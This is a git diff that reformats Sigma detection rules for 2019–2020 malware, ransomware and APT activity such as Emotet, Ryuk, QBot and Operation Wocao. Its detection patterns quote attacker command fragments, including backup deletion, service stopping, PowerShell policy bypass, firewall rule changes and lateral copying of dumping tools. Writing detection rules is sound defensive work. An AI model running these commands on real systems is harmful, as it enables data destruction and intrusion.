b/sigma/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml @@ -5,8 +5,7 @@ description: Detects potential Dridex acitvity via specific process patterns references: - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3 - https://redcanary.com/threat-detection-report/threats/dridex/ -author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron - Systems) +author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/10 modified: 2023/02/03 tags: @@ -25,33 +24,31 @@ detection: EventID: 4688 Channel: Security selection_svchost: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \Desktop\ - NewProcessName|endswith: \svchost.exe + NewProcessName|endswith: \svchost.exe filter_svchost: ParentProcessName|startswith: C:\Windows\System32\ selection_regsvr: - CommandLine|contains: + CommandLine|contains: - ' -s ' - \AppData\Local\Temp\ ParentProcessName|endswith: \excel.exe - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe filter_regsvr: - CommandLine|contains: .dll + CommandLine|contains: .dll selection_anomaly_parent: ParentProcessName|endswith: \svchost.exe selection_anomaly_child_1: - CommandLine|contains: ' /all' - NewProcessName|endswith: \whoami.exe + CommandLine|contains: ' /all' + NewProcessName|endswith: \whoami.exe selection_anomaly_child_2: - CommandLine|contains: ' view' - NewProcessName|endswith: + CommandLine|contains: ' view' + NewProcessName|endswith: - \net.exe - \net1.exe - condition: process_creation and ((selection_svchost and not filter_svchost) or - (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and - 1 of selection_anomaly_child_*)) + condition: process_creation and ((selection_svchost and not filter_svchost) or (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and 1 of selection_anomaly_child_*)) falsepositives: - Unlikely level: critical diff --git a/sigma/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml b/sigma/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml index 69f8e0921..2229c4279 100644 --- a/sigma/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml +++ b/sigma/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml @@ -23,15 +23,15 @@ detection: EventID: 4688 Channel: Security selection_ping: - CommandLine|contains|all: + CommandLine|contains|all: - 'ping -n ' - ' echo EEEE > ' selection_ipconfig: - CommandLine|contains|all: + CommandLine|contains|all: - ipconfig /all - \temp\res.ip selection_netsh: - CommandLine|contains|all: + CommandLine|contains|all: - interface ip show config - \temp\netsh.res condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml b/sigma/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml index 7dcca551e..6681a803f 100644 --- a/sigma/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml +++ b/sigma/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml @@ -1,8 +1,7 @@ title: Potential Emotet Activity id: d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18 status: stable -description: Detects all Emotet like process executions that are not covered by the - more generic rules +description: Detects all Emotet like process executions that are not covered by the more generic rules references: - https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/ - https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/ @@ -25,20 +24,20 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -e* PAA' - - JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ - - QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA - - kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA - - IgAoACcAKgAnACkAOwAkA - - IAKAAnACoAJwApADsAJA - - iACgAJwAqACcAKQA7ACQA + - JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ # $env:userprofile + - QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA # $env:userprofile + - kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA # $env:userprofile + - IgAoACcAKgAnACkAOwAkA # "('*');$ + - IAKAAnACoAJwApADsAJA # "('*');$ + - iACgAJwAqACcAKQA7ACQA # "('*');$ - JABGAGwAeAByAGgAYwBmAGQ - - PQAkAGUAbgB2ADoAdABlAG0AcAArACgA - - 0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA - - 9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA + - PQAkAGUAbgB2ADoAdABlAG0AcAArACgA # =$env:temp+( + - 0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA # =$env:temp+( + - 9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA # =$env:temp+( filter: - CommandLine|contains: + CommandLine|contains: - fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ - wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA - 8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA diff --git a/sigma/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml b/sigma/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml index 1a027c1e4..26e3547c7 100644 --- a/sigma/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml +++ b/sigma/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml @@ -1,10 +1,7 @@ title: Formbook Process Creation id: 032f5fb3-d959-41a5-9263-4173c802dc2b status: test -description: Detects Formbook like process executions that inject code into a set - of files in the System32 folder, which executes a special command command line - to delete the dropper from the AppData Temp folder. We avoid false positives by - excluding all parent process with command line parameters. +description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters. references: - https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer - https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/ @@ -25,28 +22,31 @@ detection: EventID: 4688 Channel: Security selection1: + # Parent command line should not contain a space value + # This avoids false positives not caused by process injection + # e.g. wscript.exe /B sysmon-install.vbs ParentCommandLine|startswith: - C:\Windows\System32\ - C:\Windows\SysWOW64\ ParentCommandLine|endswith: .exe selection2: - - CommandLine|contains|all: - - /c - - del - - C:\Users\ - - \AppData\Local\Temp\ - - CommandLine|contains|all: - - /c - - del - - C:\Users\ - - \Desktop\ - - CommandLine|contains|all: - - /C - - type nul > - - C:\Users\ - - \Desktop\ + - CommandLine|contains|all: + - /c + - del + - C:\Users\ + - \AppData\Local\Temp\ + - CommandLine|contains|all: + - /c + - del + - C:\Users\ + - \Desktop\ + - CommandLine|contains|all: + - /C + - type nul > + - C:\Users\ + - \Desktop\ selection3: - CommandLine|endswith: .exe + CommandLine|endswith: .exe condition: process_creation and (all of selection*) fields: - CommandLine diff --git a/sigma/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml b/sigma/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml index 84f5705de..c44323e1a 100644 --- a/sigma/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml +++ b/sigma/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: -i SM-tgytutrc -s + CommandLine|contains: -i SM-tgytutrc -s condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml b/sigma/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml index d5e525499..12c863c7c 100644 --- a/sigma/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml +++ b/sigma/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml @@ -1,8 +1,7 @@ title: Potential QBot Activity id: 4fcac6eb-0287-4090-8eea-2602e4c20040 status: stable -description: Detects potential QBot activity by looking for process executions used - previously by QBot +description: Detects potential QBot activity by looking for process executions used previously by QBot references: - https://twitter.com/killamjr/status/1179034907932315648 - https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/ @@ -22,11 +21,11 @@ detection: Channel: Security selection1: ParentProcessName|endswith: \WinRAR.exe - NewProcessName|endswith: \wscript.exe + NewProcessName|endswith: \wscript.exe selection2: - CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type ' + CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type ' selection3: - CommandLine|contains|all: + CommandLine|contains|all: - regsvr32.exe - C:\ProgramData - .tmp diff --git a/sigma/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml b/sigma/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml index f07e6b7e3..8b10b62ae 100644 --- a/sigma/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml +++ b/sigma/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml @@ -1,17 +1,16 @@ title: Potential Ryuk Ransomware Activity id: c37510b8-2107-4b78-aa32-72f251e7a844 related: - - id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27 - type: similar - - id: 0acaad27-9f02-4136-a243-c357202edd74 - type: obsoletes + - id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27 + type: similar + - id: 0acaad27-9f02-4136-a243-c357202edd74 + type: obsoletes status: stable description: Detects Ryuk ransomware activity references: - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/ - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/ -author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron - Systems) +author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems) date: 2019/12/16 modified: 2023/02/03 tags: @@ -26,25 +25,25 @@ detection: EventID: 4688 Channel: Security selection_reg: - CommandLine|contains|all: + CommandLine|contains|all: - Microsoft\Windows\CurrentVersion\Run - C:\users\Public\ selection_del: - CommandLine|contains|all: + CommandLine|contains|all: - del /s /f /q c:\ - \*.bac - \*.bak - \*.bkf selection_net: - CommandLine|contains|all: + CommandLine|contains|all: - ' stop ' - ' /y' - CommandLine|contains: + CommandLine|contains: - samss - audioendpointbuilder - unistoresvc_ - AcrSch2Svc - NewProcessName|endswith: + NewProcessName|endswith: - \net.exe - \net1.exe condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml b/sigma/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml index 7d4ffd93a..fb36aa973 100644 --- a/sigma/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml +++ b/sigma/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml @@ -1,8 +1,7 @@ title: Potential Snatch Ransomware Activity id: 5325945e-f1f0-406e-97b8-65104d393fff status: stable -description: Detects specific process characteristics of Snatch ransomware word document - droppers +description: Detects specific process characteristics of Snatch ransomware word document droppers references: - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ author: Florian Roth (Nextron Systems) @@ -20,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: - - shutdown /r /f /t 00 + CommandLine|contains: + - shutdown /r /f /t 00 # Shutdown in safe mode immediately - net stop SuperBackupMan condition: process_creation and selection fields: @@ -29,7 +28,6 @@ fields: - NewProcessName - ComputerName falsepositives: - - Scripts that shutdown the system immediately and reboot them in safe mode are - unlikely + - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely level: high ruletype: Sigma diff --git a/sigma/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml b/sigma/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml index cfea059b5..48f03fba3 100644 --- a/sigma/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml +++ b/sigma/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml @@ -1,12 +1,10 @@ title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0 status: test -description: Detects potential BlueMushroom DLL loading activity via regsvr32 from - AppData Local +description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local references: - https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg -author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron - Systems) +author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/02 modified: 2023/03/29 tags: @@ -21,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - regsvr32 - \AppData\Local\ - .dll diff --git a/sigma/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml b/sigma/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml index 4a2498120..bd9f91174 100644 --- a/sigma/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml +++ b/sigma/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml @@ -1,8 +1,7 @@ title: APT31 Judgement Panda Activity id: 03e2746e-2b31-42f1-ab7a-eb39365b2422 status: test -description: Detects APT31 Judgement Panda activity as described in the Crowdstrike - 2019 Global Threat Report +description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Florian Roth (Nextron Systems) @@ -23,15 +22,15 @@ detection: EventID: 4688 Channel: Security selection_ldifde: - CommandLine|contains|all: + CommandLine|contains|all: - ldifde - -f -n - eprod.ldf selection_lateral_movement: - CommandLine|contains|all: + CommandLine|contains|all: - copy \\\\ - c$ - CommandLine|contains: + CommandLine|contains: - \aaaa\procdump64.exe - \aaaa\netsess.exe - \aaaa\7za.exe diff --git a/sigma/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml b/sigma/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml index c4f18518f..cdbd7ffa9 100644 --- a/sigma/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml +++ b/sigma/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml @@ -1,8 +1,7 @@ title: Potential Russian APT Credential Theft Activity id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee status: stable -description: Detects Russian group activity as described in Global Threat Report 2019 - by Crowdstrike +description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Florian Roth (Nextron Systems) @@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection_xcopy: - CommandLine|contains|all: + CommandLine|contains|all: - xcopy /S /E /C /Q /H \\\\ - \sysvol\ selection_adexplorer: - CommandLine|contains|all: + CommandLine|contains|all: - adexplorer -snapshot "" c:\users\ - \downloads\ - .snp diff --git a/sigma/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml b/sigma/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml index 99ba56a51..31eff7409 100644 --- a/sigma/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml +++ b/sigma/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml @@ -20,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: - - /e:jscript + CommandLine|contains|all: + - /e:jscript # This is a guess since the report doesn't mention the method of execution. This assumes that it is achieved via specifying the execution engine - \Local\Temp\Errors.bat condition: process_creation and selection falsepositives: diff --git a/sigma/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml b/sigma/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml index 64353dfd2..2fc96f369 100644 --- a/sigma/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml +++ b/sigma/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml @@ -1,8 +1,7 @@ title: Equation Group DLL_U Export Function Load id: d465d1d8-27a2-4cca-9621-a800f37cf72e status: stable -description: Detects a specific export function name used by one of EquationGroup - tools +description: Detects a specific export function name used by one of EquationGroup tools references: - https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type= - https://twitter.com/cyb3rops/status/972186477512839170 @@ -22,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains: -export dll_u - - CommandLine|endswith: - - ',dll_u' - - ' dll_u' + - CommandLine|contains: -export dll_u + - CommandLine|endswith: + - ',dll_u' + - ' dll_u' condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml b/sigma/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml index 60036d28b..8dcd7da61 100644 --- a/sigma/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml +++ b/sigma/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml @@ -21,18 +21,18 @@ detection: EventID: 4688 Channel: Security selection_cli: - - CommandLine|contains: - - Temp\wtask.exe /create - - '%windir:~-3,1%%PUBLIC:~-9,1%' - - '/tn "Security Script ' - - '%windir:~-1,1%' - - CommandLine|contains|all: - - /E:vbscript - - C:\Users\ - - .txt - - /F + - CommandLine|contains: + - Temp\wtask.exe /create + - '%windir:~-3,1%%PUBLIC:~-9,1%' + - '/tn "Security Script ' + - '%windir:~-1,1%' + - CommandLine|contains|all: + - /E:vbscript + - C:\Users\ + - .txt + - /F selection_img: - NewProcessName|endswith: Temp\winwsh.exe + NewProcessName|endswith: Temp\winwsh.exe condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml b/sigma/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml index b9b04619f..f5e5a7331 100644 --- a/sigma/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml +++ b/sigma/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml @@ -1,8 +1,8 @@ title: Operation Wocao Activity id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab related: - - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d - type: derived + - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d + type: derived status: test description: Detects activity mentioned in Operation Wocao report references: @@ -24,14 +24,13 @@ tags: logsource: category: process_creation product: windows - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: process_creation: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - checkadmin.exe 127.0.0.1 -all - netsh advfirewall firewall add rule name=powershell dir=in - cmd /c powershell.exe -ep bypass -file c:\s.ps1 diff --git a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml index 984727038..243fcc6f3 100644 --- a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml +++ b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml @@ -1,8 +1,7 @@ title: CVE-2020-0688 Exploitation via Eventlog id: d6266bf5-935e-4661-b477-78772735a7cb status: test -description: Detects the exploitation of Microsoft Exchange vulnerability as described - in CVE-2020-0688 +description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 references: - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/ - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/ diff --git a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml index fd72bb25e..c3010eb88 100644 --- a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml +++ b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml @@ -1,8 +1,7 @@ title: Exploited CVE-2020-10189 Zoho ManageEngine id: 846b866e-2a57-46ee-8e16-85fa92759be7 status: test -description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization - vulnerability reported as CVE-2020-10189 +description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 references: - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224 @@ -27,7 +26,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: DesktopCentral_Server\jre\bin\java.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \powershell.exe - \pwsh.exe diff --git a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml index 65c7d735a..90104f0f8 100644 --- a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml +++ b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml @@ -1,8 +1,7 @@ title: Suspicious PrinterPorts Creation (CVE-2020-1048) id: cc08d590-8b90-413a-aff6-31d1a99678d7 status: test -description: Detects new commands that add new printer port which point to suspicious - file +description: Detects new commands that add new printer port which point to suspicious file references: - https://windows-internals.com/printdemon-cve-2020-1048/ author: EagleEye Team, Florian Roth @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: Add-PrinterPort -Name + CommandLine|contains: Add-PrinterPort -Name selection2: - CommandLine|contains: + CommandLine|contains: - .exe - .dll - .bat selection3: - CommandLine|contains: Generic / Text Only + CommandLine|contains: Generic / Text Only condition: process_creation and ((selection1 and selection2) or selection3) falsepositives: - New printer port install on host diff --git a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml index d60ee4545..cb7a47f54 100644 --- a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml +++ b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml @@ -1,8 +1,7 @@ title: DNS RCE CVE-2020-1350 id: b5281f31-f9cc-4d0d-95d0-45b91c45b487 status: test -description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the - detection of suspicious sub process +description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process references: - https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ - https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html @@ -26,7 +25,7 @@ detection: selection: ParentProcessName|endswith: \System32\dns.exe filter: - NewProcessName|endswith: + NewProcessName|endswith: - \System32\werfault.exe - \System32\conhost.exe - \System32\dnscmd.exe diff --git a/sigma/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml b/sigma/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml index d1dc915ba..5b83188eb 100644 --- a/sigma/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml +++ b/sigma/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml @@ -1,8 +1,8 @@ title: Blue Mockingbird id: c3198a27-23a0-4c2c-af19-e5328d49680e related: - - id: ce239692-aa94-41b3-b32f-9cab259c96ea - type: merged + - id: ce239692-aa94-41b3-b32f-9cab259c96ea + type: merged status: test description: Attempts to detect system changes made by Blue Mockingbird references: @@ -23,13 +23,13 @@ detection: EventID: 4688 Channel: Security sc_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - sc config - wercplsupporte.dll - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe wmic_cmd: - CommandLine|endswith: COR_PROFILER - NewProcessName|endswith: \wmic.exe + CommandLine|endswith: COR_PROFILER + NewProcessName|endswith: \wmic.exe condition: process_creation and (sc_cmd or wmic_cmd) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml b/sigma/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml index a6548ede8..45ea2cd02 100644 --- a/sigma/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml +++ b/sigma/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml @@ -1,8 +1,7 @@ title: Potential Emotet Rundll32 Execution id: 54e57ce3-0672-46eb-a402-2c0948d5e3e9 status: test -description: Detecting Emotet DLL loading by looking for rundll32.exe processes with - command lines ending in ,RunDLL or ,Control_RunDLL +description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL references: - https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html - https://cyber.wtf/2021/11/15/guess-whos-back/ @@ -21,14 +20,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: - ',RunDLL' - ',Control_RunDLL' + # - ',#1' too generic - function load by ordinal is not Emotet specific filter_legitimate_dll: - CommandLine|endswith: + CommandLine|endswith: - .dll,Control_RunDLL - .dll",Control_RunDLL - .dll',Control_RunDLL diff --git a/sigma/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml b/sigma/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml index d92a5c12e..4879d7db9 100644 --- a/sigma/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml +++ b/sigma/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml @@ -1,8 +1,7 @@ title: Potential Ke3chang/TidePool Malware Activity id: 7b544661-69fc-419f-9a59-82ccc328f205 status: test -description: Detects registry modifications potentially related to the Ke3chang/TidePool - malware as seen in campaigns running in 2019 and 2020 +description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020 references: - https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ @@ -22,7 +21,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + # Ke3chang and TidePool both modify the IEHarden registry key, as well as the following list of keys. + # Setting these registry keys is unique to the Ke3chang and TidePool malware families. + # HKCU\Software\Microsoft\Internet Explorer\Main\Check_Associations + # HKCU\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize + # 